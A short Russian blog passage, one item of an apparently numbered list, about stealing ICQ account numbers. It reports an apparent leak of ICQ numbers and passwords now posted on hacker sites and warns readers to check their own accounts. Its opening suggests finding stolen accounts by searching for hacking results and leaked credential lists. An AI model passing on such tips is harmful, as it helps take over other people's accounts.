6. Как украсть номер icq? Спросите у Яндекса, в прямом смысле. Украсть номер icq можно покопавшись в результатах выдачи поисковых систем, например, по запросу “взломать номер icq”. В апреле прошлого года произошел сбой в работе icq, его официальная версия - модернизация системы авторизации на площадках AOL (America Online - специалисты 0компании AOL занимаются технической поддержкой программы icq). Специалисты предполагают, что в процессе программной аварии произошла утечка баз данных программы icq. База эта включает в себя номера UIN и пароли к ним. Разумеется, все было закодировано, но, судя по всему, защищенная информация оказалась взломанной, и теперь на многочисленных хакерских ресурсах по частям выкладываются списки номеров icq и пароли к ним. Проверьте, может быть кража номера icq, который у вас, уже произведена.

Скачать бесплатно icq 7 c letitbit

Powered By Blogger